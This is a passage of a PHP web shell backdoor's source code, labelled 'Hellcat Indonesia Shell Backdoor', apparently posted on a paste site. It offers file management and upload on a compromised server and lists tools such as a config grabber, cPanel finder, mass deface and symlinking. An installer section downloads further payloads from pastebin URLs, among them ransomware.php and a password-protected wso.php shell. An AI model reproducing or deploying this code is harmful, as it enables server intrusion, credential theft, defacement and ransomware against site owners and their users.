  2075.                             }
  2076.                         }
  2077.                     }
  2078.                 } elseif($_COOKIE['act'] == 'tar') {
  2079.                     chdir($_COOKIE['location']);
  2080.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
  2081.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
  2082.                     chdir($GLOBALS['cwd']);
  2083.                 }
  2084.                 unset($_COOKIE['msv5']);
  2085.                 setcookie('msv5', '', time() - 3600);
  2086.                 break;
  2087.             default:
  2088.                 if(!empty($_COEG['hcx'])) {
  2089.                     vb('act', $_COEG['hcx']);
  2090.                     vb('msv5', serialize(@$_COEG['msv5']));
  2091.                     vb('location', @$_COEG['location']);
  2092.                 }
  2093.                 break;
  2094.         }
  2095.     }
  2096. vars('<script>function m1s(){
  2097. if(document.getElementById("act").value == ""){');
  2098.    s('Select Action !!');
  2099.     vars('  return false;
  2100.    }
  2101.    document.getElementById("sks").submit();
  2102.  }
  2103. </script>');
  2104. vars('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
  2105. vars('<div class="coL-panel"><table>
  2106. <td class="td-panel"><center><i class="fa fa-newspaper-o"></i></center></td><td class="td-panel-right"><marquee>Hellcat Indonesia Shell Backdoor - Version 1.3</marquee></td></table></div>');
  2107.        
  2108.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
  2109.     if($dirContent === false) {
  2110.         vars('<script>c("?'.x7.'error&'.x5.$dir.'");</script>');
  2111. return;
  2112. }
  2113.     global $sort;
  2114.     $sort = array('name', 1);
  2115.     if(!empty($_COEG['hcx'])) {
  2116.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
  2117.             $sort = array($match[1], (int)$match[2]);
  2118.     }
  2119. vars('<script language="JavaScript">
  2120. function toggle(source) {
  2121.  checkboxes = document.getElementsByName("msv5[]");
  2122.  for(var i=0, n=checkboxes.length;i<n;i++) {
  2123.    checkboxes[i].checked = source.checked;
  2124.  }
  2125. }
  2126. </script>');
  2127. vars('<table class="table-file" cellspacing="0">
  2128. <th class="th-file">Name</th>
  2129. <th class="th-file" style="width:80px">Size</th>
  2130. <th class="th-file" style="width:65px">Action</th>
  2131. <th class="th-file"></th>
  2132. <tr>');
  2133. $dir = getcwd();
  2134. $scn = scandir($dir);
  2135.         foreach($scn as $dirx) {
  2136.         $dtype = filetype("$dir/$dirx");
  2137.  if(!is_dir("$dir/$dirx")) continue;
  2138.             if($dirx === '..') {
  2139.                 $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
  2140.             }
  2141. elseif($dirx === '.') {
  2142.                 $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
  2143.             } else {
  2144.                 $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
  2145.             }
  2146.             if($dirx === '.' || $dirx === '..') {
  2147.                 $d_zx = "<font color='#ddd'>--</font>";
  2148.                 $ckh = '<input type="checkbox" disabled>';
  2149.             } else {
  2150.                 $d_zx = '<a class="a" onclick=\'c("?'.x7.'upload&'.x5.$dir.'/'.$dirx.'")\'>U</a> |
  2151. <a class="a" onclick=\'c("?'.x7.'renadir&'.x5.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?'.x7.'deledir&'.x5.$dir.'/'.$dirx.'")\'>D</a>';
  2152.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
  2153.             }
  2154.  echo "<tr class='ex-hov'>";
  2155.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp;[ $href
  2156. ]</td>";
  2157.     echo "<td align='center' class='td-file'><center>--</center></th>";
  2158.     echo "<td align='center' class='td-file'>$d_zx</td>";
  2159.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
  2160.         }
  2161.         echo "</tr>";
  2162. foreach($scn as $file) {
  2163.             $ftype = filetype("$dir/$file");
  2164.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2165.             $size = filesize("$dir/$file")/1024;
  2166.             $size = round($size,3);
  2167.             if($size > 1024) {
  2168.                 $size = round($size/1024,2). 'MB';
  2169.             } else {
  2170.                 $size = $size. 'KB';
  2171.             }
  2172.             if(!is_file("$dir/$file")) continue;
  2173.             echo "<tr class='ex-hov'>";
  2174.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp;<a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
  2175.             echo "<td align='center' class='td-file'>$size</td>";
  2176.             echo "<td align='center' class='td-file'>";
  2177.             echo '<a class="a" onclick=\'c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$file.'")\'>OPEN</a></td>';
  2178.             vars("<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>");
  2179. }
  2180.     vars("</table><table style='width:100%;margin-top:2px' cellspacing='0'>
  2181. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
  2182.    <input type=hidden name=ne value=''>
  2183.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
  2184.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
  2185.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>");
  2186.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
  2187.     vars("<option value='paste'>Paste</option>");
  2188.     vars("<option value=''>-- OPTIONS --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
  2189. if(class_exists('ZipArchive'))
  2190.     vars("<option value='zip'>Compress (.zip)</option>");
  2191.     vars("</select></td>");
  2192.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  2193.     vars("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
  2194.     vars("<td style='width:20%;text-align:right'><button onmousedown='bleep.play();'
  2195. type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>");
  2196.    if(isset($_COEG['ndir'])) {
  2197.     $cdir = $_COEG['newinput'];
  2198.     if (is_dir($dir.'/'.$cdir)) {
  2199. error('Directory Already Exist !!');
  2200.     } else {
  2201.         if(mkdir($dir.'/'.$cdir, 0777)) {
  2202.     vars('<script>c("?'.x5.$dir.'");</script>');;
  2203.         } else {
  2204. error('Can\'t Create Directory !!');  } } }
  2205. if(isset($_COEG['nfil'])) {
  2206.     $cfile = $_COEG['newinput'];
  2207.     if (file_exists($dir.'/'.$cfile)) {
  2208.   error('File Already Exist !!');
  2209.     } else {
  2210.         if(fopen($dir.'/'.$cfile, "w+")) {
  2211.       vars('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
  2212.         } else {
  2213. error('Can\'t Create File !!');
  2214.         }
  2215.     }
  2216. }
  2217. vars('<script language="Javascript">
  2218.         function cog(){
  2219. if(document.forms[\'new\'].newinput.value === "") {');
  2220.     s('Can\'t Be Empty !!');
  2221.     vars('return false;
  2222.     }
  2223. }
  2224. </script>');
  2225. vars('<script type="text/javascript">
  2226. function valid(field) {
  2227.        var re = /^[0-9-A-z.]*$/;
  2228.        if (!re.test(field.value)) {');
  2229.             s('Invalid Name !!');
  2230.             vars('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
  2231.        }
  2232.    }
  2233. </script>');
  2234.     vars('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
  2235.     <td>
  2236. <input type="text" name="newinput" placeholder="Create" onkeyup="valid(this);"></td>
  2237. <td><button onmousedown="bleep.play();"
  2238. type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-folder-open"></i></button></td>
  2239. <td><button onmousedown="bleep.play();"
  2240. type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-file-code-o"></i></button></td></form></table>');
  2241. }
  2242.  
  2243. vars('<hr></div>');
  2244. vars('<div class="coR">
  2245.            <div class="coR-panel"><table>
  2246. <td class="td-panel"><center><i class="fa fa-chevron-circle-down"></i></center></td><td class="td-panel-right">MENU</td></table></div><div class="tools-content">');
  2247. $path = getcwd();
  2248. if(isset($_FILES['data'])) {
  2249. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
  2250.     success('File Uploaded !!');
  2251.     mtr('?'.x5.$dir);
  2252. } else {
  2253.     error('Upload Failed !!');
  2254.     }
  2255. }
  2256. echo '<script>function upload(){
  2257. if(document.getElementById("up").value == ""){';
  2258.       s('Select Your File !!');
  2259.    vars('return false;
  2260.    }
  2261.    document.getElementById("%").submit();
  2262.  }
  2263. </script>');
  2264. vars('<table><td align="center" valign="top" style="width:10%;padding-top:9px"><i class="fa fa-upload"></i></td>
  2265.  
  2266. <td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td>
  2267.  
  2268. <td style="width:20%"><button onmousedown="bleep.play();"
  2269. type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td>
  2270.  
  2271. </table>');
  2272. if(isset($_COEG['x'])) {
  2273. $rse = $_COEG['file_name'];
  2274. $zip = new ZipArchive ;
  2275. if($zip ->open($path.'/'.$rse) === TRUE) {
  2276. $zip ->extractTo($path);
  2277. $zip ->close();
  2278.     success('[ '.$rse.' ] Extracted !!');
  2279.     mtr('?'.x5.$dir);
  2280. } else {
  2281.     error('Permission Denied !!');
  2282.     }
  2283. }
  2284. vars('<script>function unzip(){
  2285. if(document.getElementById("u").value == ""){');
  2286.       s('Select File [.zip] !!');
  2287.    vars('return false;
  2288.    }
  2289.    document.getElementById("sks").submit();
  2290.  }
  2291. </script>');
  2292. echo '<hr><table>
  2293. <form method="POST" action="?'.x5.$dir.'">
  2294. <td align="center" style="width:10%"><i class="fa fa-file-archive-o"></i></td>
  2295. <td style="width:70%"><select name="file_name" id="u">
  2296. <option value=""> -- Choose Zip File --</option>';
  2297. $scandir = scandir($path);
  2298. foreach($scandir as $file){
  2299. if(!is_file("$path/$file")) continue;
  2300. if(preg_match('/\.zip$/mis',$file)) {
  2301. echo '<option>'.$file.'</option>';
  2302.     }
  2303. }
  2304. echo '</select></td><td style="width:20%;text-align:right"><button onmousedown="bleep.play();"
  2305. type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  2306.  
  2307. vars('</div>');
  2308. vars('<div class="coR-panel top"><table>
  2309. <td class="td-panel"><center><i class="fa fa-cogs"></i></center></td><td class="td-panel-right">TOOLS : <font color="green">10</font></td></table></div>
  2310. <div class="tools-content">');
  2311. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2312. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2313. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2314. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2315. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'jumping&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2316. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2317. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'config&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2318. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2319. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cookies Manager</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cookie&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2320. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2321. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'cpanel&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2322. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2323. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'massdef&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2324. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2325. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Hash</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'multihash&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2326. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2327. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'symlink&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2328. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2329. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button onmousedown="bleep.play();"
  2330. class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  2331.  
  2332. vars('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Access [ <font color="1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button onmousedown="bleep.play();" class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table></div>');
  2333.  
  2334.  
  2335. // --- Create File --- //
  2336. vars('<script>function create(){
  2337. if(document.getElementById("c").value == ""){');
  2338.    s('Select Action !!');
  2339.     vars('return false;
  2340.    }
  2341.    document.getElementById("sks").submit();
  2342.  }
  2343. </script>');
  2344. if($_COEG['op']=="1") {
  2345.     if(op('uploader.php', 'https://pastebin.com/raw/8WtSVk6k')) {
  2346.         success('Done !!');
  2347.         mtr('?'.x5.$dir);
  2348. } else {
  2349.         error('Failed !!');
  2350.     }
  2351. }
  2352. if($_COEG['op']=="2") {
  2353.     if(op('mailler.php', 'https://pastebin.com/raw/TPtpvxZt')) {
  2354.         success('Done !!');
  2355.         mtr('?'.x5.$dir);
  2356. } else {
  2357.         error('Failed !!');
  2358.     }
  2359. }
  2360.  
  2361. if($_COEG['op']=="3") {
  2362.     if(op('php.ini', 'https://pastebin.com/raw/gnbXUciS')) {
  2363.         success('Done !!');
  2364.         mtr('?'.x5.$dir);
  2365. } else {
  2366.         error('Failed !!');
  2367.     }
  2368. }
  2369.  
  2370. if($_COEG['op']=="5") {
  2371.     if(op('ransomware.php', 'https://pastebin.com/raw/CZMeawF0')) {
  2372.         success('Done !!');
  2373.         mtr('?'.x5.$dir);
  2374. } else {
  2375.         error('Failed !!');
  2376.     }
  2377. }
  2378. if($_COEG['op']=="6") {
  2379.     if(op('wso.php', 'https://pastebin.com/raw/1GeZGycM')) {
  2380.         success('Done !!');
  2381.         mtr('?'.x5.$dir);
  2382. } else {
  2383.         error('Failed !!');
  2384.     }
  2385. }
  2386. vars('<div class="tools-content top" style="padding:5px">');
  2387. vars('<table>
  2388. <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-download"></span></td>
  2389. <td style="width:70%"><select name="op" id="c">');
  2390. vars('<option value=""> -- INSTALLER --</option>');
  2391. vars('<option value="1">uploader.php</option>');
  2392. vars('<option value="2">mailler.php</option>');
  2393. vars('<option value="3">php.ini</option>');
  2394. vars('<option value="5">ransomware.php</option>');
  2395. vars('<option value="6">wso.php [ pass : brtz07 ]</option>');
  2396. vars('</select></td>
  2397. <td style="width:20%;text-align:right"><button onmousedown="bleep.play();" type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
  2398. </div>');
  2399.  
  2400.  
  2401. //-- THANKS ALL --//
  2402. ?>
Add Comment
Please, Sign In to add comment